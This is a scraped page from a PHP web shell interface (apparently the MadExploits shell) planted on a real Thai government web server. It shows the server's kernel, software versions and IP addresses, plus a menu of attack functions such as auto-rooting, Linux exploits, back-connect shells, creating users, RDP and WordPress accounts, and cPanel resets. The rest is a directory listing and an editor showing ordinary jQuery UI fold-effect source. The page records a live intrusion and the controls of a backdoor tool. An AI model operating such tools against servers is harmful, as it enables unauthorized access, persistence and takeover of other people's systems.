Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
jquery /
ui /
[ HOME SHELL ]
Name
Size
Permission
Action
i18n
[ DIR ]
drwxr-xr-x
minified
[ DIR ]
drwxr-xr-x
jquery-ui-1.8.13.custom.js
362.09
KB
-rwxr-xr-x
jquery.effects.blind.js
1.35
KB
-rwxr-xr-x
jquery.effects.bounce.js
2.99
KB
-rwxr-xr-x
jquery.effects.clip.js
1.64
KB
-rwxr-xr-x
jquery.effects.core.js
22.37
KB
-rwxr-xr-x
jquery.effects.drop.js
1.62
KB
-rwxr-xr-x
jquery.effects.explode.js
2.32
KB
-rwxr-xr-x
jquery.effects.fade.js
691
B
-rwxr-xr-x
jquery.effects.fold.js
1.86
KB
-rwxr-xr-x
jquery.effects.highlight.js
1.17
KB
-rwxr-xr-x
jquery.effects.pulsate.js
1.19
KB
-rwxr-xr-x
jquery.effects.scale.js
6.78
KB
-rwxr-xr-x
jquery.effects.shake.js
1.89
KB
-rwxr-xr-x
jquery.effects.slide.js
1.62
KB
-rwxr-xr-x
jquery.effects.transfer.js
1.1
KB
-rwxr-xr-x
jquery.ui.accordion.js
15.88
KB
-rwxr-xr-x
jquery.ui.autocomplete.js
16.14
KB
-rwxr-xr-x
jquery.ui.button.js
10.14
KB
-rwxr-xr-x
jquery.ui.core.js
8.02
KB
-rwxr-xr-x
jquery.ui.datepicker.js
73.38
KB
-rwxr-xr-x
jquery.ui.dialog.js
21.3
KB
-rwxr-xr-x
jquery.ui.draggable.js
29.71
KB
-rwxr-xr-x
jquery.ui.droppable.js
9.24
KB
-rwxr-xr-x
jquery.ui.mouse.js
4.1
KB
-rwxr-xr-x
jquery.ui.position.js
7.17
KB
-rwxr-xr-x
jquery.ui.progressbar.js
2.32
KB
-rwxr-xr-x
jquery.ui.resizable.js
25.78
KB
-rwxr-xr-x
jquery.ui.selectable.js
6.68
KB
-rwxr-xr-x
jquery.ui.slider.js
17.18
KB
-rwxr-xr-x
jquery.ui.sortable.js
39.01
KB
-rwxr-xr-x
jquery.ui.tabs.js
20.75
KB
-rwxr-xr-x
jquery.ui.widget.js
6.7
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jquery.effects.fold.js
/* * jQuery UI Effects Fold 1.8.13 * * Copyright 2011, AUTHORS.txt (http://jqueryui.com/about) * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * http://docs.jquery.com/UI/Effects/Fold * * Depends: * jquery.effects.core.js */ (function( $, undefined ) { $.effects.fold = function(o) { return this.queue(function() { // Create element var el = $(this), props = ['position','top','bottom','left','right']; // Set options var mode = $.effects.setMode(el, o.options.mode || 'hide'); // Set Mode var size = o.options.size || 15; // Default fold size var horizFirst = !(!o.options.horizFirst); // Ensure a boolean value var duration = o.duration ? o.duration / 2 : $.fx.speeds._default / 2; // Adjust $.effects.save(el, props); el.show(); // Save & Show var wrapper = $.effects.createWrapper(el).css({overflow:'hidden'}); // Create Wrapper var widthFirst = ((mode == 'show') != horizFirst); var ref = widthFirst ? ['width', 'height'] : ['height', 'width']; var distance = widthFirst ? [wrapper.width(), wrapper.height()] : [wrapper.height(), wrapper.width()]; var percent = /([0-9]+)%/.exec(size); if(percent) size = parseInt(percent[1],10) / 100 * distance[mode == 'hide' ? 0 : 1]; if(mode == 'show') wrapper.css(horizFirst ? {height: 0, width: size} : {height: size, width: 0}); // Shift // Animation var animation1 = {}, animation2 = {}; animation1[ref[0]] = mode == 'show' ? distance[0] : size; animation2[ref[1]] = mode == 'show' ? distance[1] : 0; // Animate wrapper.animate(animation1, duration, o.options.easing) .animate(animation2, duration, o.options.easing, function() { if(mode == 'hide') el.hide(); // Hide $.effects.restore(el, props); $.effects.removeWrapper(el); // Restore if(o.callback) o.callback.apply(el[0], arguments); // Callback el.dequeue(); }); }); }; })(jQuery);
Close